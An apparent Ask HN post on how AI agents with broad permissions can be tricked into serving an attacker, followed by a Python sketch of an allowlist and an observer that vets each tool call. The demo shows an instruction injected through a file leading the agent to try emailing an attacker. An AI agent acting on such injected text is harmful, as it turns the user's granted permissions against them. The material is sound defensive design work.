


An agent's value is proportional to the permissions it's been granted.

There's been a lot of hype around solutions like default-deny proxies, key vaults, and more, but none of them seems to address the core tension: an agent can be tricked into doing an attacker's bidding.

The best thing I could come up with was to run an observer loop that uses another LLM to monitor everything the agent does, but I'm curious whether anyone has an elegant solution.
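The observer-loop idea from the post, layered behind a default-deny allowlist, could look something like the Python sketch below. This is a minimal illustration under stated assumptions, not an established solution: `ToolCall`, `GuardedExecutor`, `toy_observer`, the tool names and the email addresses are all hypothetical, and the observer is a rule-based stand-in for the second LLM the post describes.

```python
from dataclasses import dataclass, field
from typing import Callable


@dataclass(frozen=True)
class ToolCall:
    """A tool invocation proposed by the agent (hypothetical shape)."""
    tool: str
    args: dict


# An observer sees the user's original task and one proposed call and returns
# True to allow it. In a real system this would prompt a second LLM.
Observer = Callable[[str, ToolCall], bool]


@dataclass
class GuardedExecutor:
    task: str          # the user's original, trusted request
    allowlist: set     # default deny: only these tool names may run
    observer: Observer
    tools: dict        # tool name -> implementation
    audit_log: list = field(default_factory=list)

    def execute(self, call: ToolCall) -> str:
        # Layer 1: default deny. Anything not explicitly allowed is refused.
        if call.tool not in self.allowlist or call.tool not in self.tools:
            self.audit_log.append((call, "denied: not allowlisted"))
            raise PermissionError(f"tool {call.tool!r} is not allowlisted")
        # Layer 2: the observer checks the call against the original task.
        if not self.observer(self.task, call):
            self.audit_log.append((call, "denied: observer"))
            raise PermissionError(f"observer rejected {call.tool!r}")
        self.audit_log.append((call, "allowed"))
        return self.tools[call.tool](**call.args)


def toy_observer(task: str, call: ToolCall) -> bool:
    # Hypothetical rule-based stand-in for the LLM judge. It ignores `task`;
    # a real judge would compare the call against it. Only allows email
    # to example.com addresses.
    if call.tool == "send_email":
        return call.args.get("to", "").endswith("@example.com")
    return True


if __name__ == "__main__":
    ex = GuardedExecutor(
        task="Summarize report.txt and email it to alice@example.com",
        allowlist={"read_file", "send_email"},
        observer=toy_observer,
        tools={
            "read_file": lambda path: f"contents of {path}",
            "send_email": lambda to, body: f"sent to {to}",
        },
    )
    print(ex.execute(ToolCall("read_file", {"path": "report.txt"})))
    try:
        # e.g. an instruction injected via the contents of report.txt
        ex.execute(ToolCall("send_email", {"to": "attacker@evil.test", "body": "..."}))
    except PermissionError as err:
        print(err)
```

One design choice here: the observer is shown only the user's original task and the proposed call, not the untrusted content the agent has read, which may narrow the observer's own exposure to injected instructions without eliminating it. It also cannot catch a harmful action that looks consistent with the task, so it reduces rather than resolves the tension the post describes.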

Ask HN: How are you solving the AI "confused deputy" problem?